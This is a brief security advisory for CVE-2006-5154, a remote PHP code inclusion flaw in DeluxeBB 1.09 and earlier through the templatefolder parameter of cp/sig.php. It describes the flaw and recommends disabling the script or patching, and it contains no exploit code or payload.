CVE-2006-5154

Name of the Vulnerable Software and Affected Versions DeluxeBB versions 1.09 and earlier

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the templatefolder parameter. This can be exploited by providing a malicious URL to the vulnerable parameter, potentially leading to code execution.

Recommendations For DeluxeBB versions 1.09 and earlier, consider disabling the cp/sig.php script until a patch is available or apply any available security patches to prevent exploitation. Avoid using the templatefolder parameter with untrusted input to minimize the risk of code execution.